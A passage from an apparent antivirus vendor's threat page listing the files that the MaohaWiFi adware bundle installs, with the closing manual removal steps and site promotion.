    %Program Files%\Maoha\MaohaAP\ICSDHCP.dll (618 bytes)
    %Program Files%\Maoha\MaohaAP\res\support.dat (35 bytes)
    %Program Files%\Maoha\MaohaAP\7z.dll (921 bytes)
    %Program Files%\Maoha\MaohaAP\maohasubstat.dll (162 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab8B71.tmp (52 bytes)
    %Program Files%\Maoha\MaohaAP\Updater\MaohaWiFiUpg.exe (538 bytes)
    %Program Files%\Maoha\MaohaAP\drv64\drv64.exe (194 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.bat (26 bytes)
    %Program Files%\Maoha\MaohaAP\dt.exe (13 bytes)
    %Program Files%\Maoha\MaohaAP\uninstall.dll (598 bytes)
    %Program Files%\Maoha\MaohaAP\ext\5.dll (27 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiBase.dll (287 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MaohaWiFi.lnk (1 bytes)
    %Program Files%\Maoha\MaohaAP\MaoHaCD.dll (50 bytes)
    %Program Files%\Maoha\MaohaAP\maohawificfg.ini (60 bytes)
    %Program Files%\Maoha\MaohaAP\MyTheme.dll (134 bytes)
    %Program Files%\Maoha\MaohaAP\Updater\CheckUpdate.dll (256 bytes)
    %Program Files%\Maoha\MaohaAP\ResLoader.dll (112 bytes)
    %Program Files%\Maoha\MaohaAP\ext\6.dll (70 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar8B72.tmp (2712 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\卸载MaohaWiFi.lnk (1 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\index.html (6 bytes)
    %Program Files%\Maoha\MaohaAP\ext\3.dll (19 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiSvr.exe (168 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.reg (16 bytes)
    %Program Files%\Maoha\MaohaAP\tipsdll.dll (237 bytes)
    %Program Files%\Maoha\MaohaAP\WifiHelp64.exe (71 bytes)
    %Program Files%\Maoha\MaohaAP\pcidetect.dll (238 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\litlogo.png (1 bytes)
    %Program Files%\Maoha\MaohaAP\drv64\DIFxAPI.dll (519 bytes)
    %Program Files%\Maoha\MaohaAP\softconfig.dll (1595 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75BC.tmp (2712 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\app_logo.png (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (1720 bytes)
    %Program Files%\Maoha\MaohaAP\SmartAction.dll (426 bytes)
    %Program Files%\Maoha\MaohaAP\RaAPAPI.dll (1 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiXP.dll (157 bytes)
    %Program Files%\Maoha\MaohaAP\res\MaohaWiFiDir.ico (226 bytes)
    %Program Files%\Maoha\MaohaAP\Uninst.dar1 (18 bytes)
    %Program Files%\Maoha\MaohaAP\MaoHaWiFiNet.sys (618 bytes)
    %Program Files%\Maoha\MaohaAP\driver\DriverTool.dll (112 bytes)
    %Program Files%\Maoha\MaohaAP\driver\DriverInstall.exe (101 bytes)
    %Program Files%\Maoha\MaohaAP\YunExplorer.exe (680 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75CE.tmp (2712 bytes)
    %Program Files%\Maoha\MaohaAP\MaoHaWiFiNet64.sys (1 bytes)
    %Program Files%\Maoha\MaohaAP\ApSetting.ini (487 bytes)
    %Program Files%\Maoha\MaohaAP\tips.exe (569 bytes)
    %Program Files%\Maoha\MaohaAP\DIFxAPI.dll (323 bytes)
    %Program Files%\Maoha\MaohaAP\res\MaohaWiFi.ico (226 bytes)
    %Program Files%\Maoha\MaohaAP\SkinBase.dll (125 bytes)
    %Program Files%\Maoha\MaohaAP\PhonetypeData.dat (24 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWiFi.exe (50 bytes)
    %Program Files%\Maoha\MaohaAP\res\Skin\Skin.rdb (260 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\info.png (9 bytes)
    %Program Files%\Maoha\MaohaAP\Uninstall.exe (1399 bytes)
    %Program Files%\Maoha\MaohaAP\ext\1.dll (23 bytes)
    %Program Files%\Maoha\MaohaAP\HWID.ini (11 bytes)
    %Program Files%\Maoha\MaohaAP\ext\4.dll (18 bytes)
    %Program Files%\Maoha\MaohaAP\pcid.dll (244 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\MaohaWiFi.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.7z (996985 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Bin\ChannelU.dll (26364175 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\aavc.ini (32 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.packed.7z (59963 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\UCBrowserSetup.exe (70898 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\config.ini (195 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\7z.dll (1841 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26515\MaoHaWiFiSetup_265.exe (1167614 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp2624aaaaaa (3172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe (81695 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26548\setup.3.15.exe (425601 bytes)
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now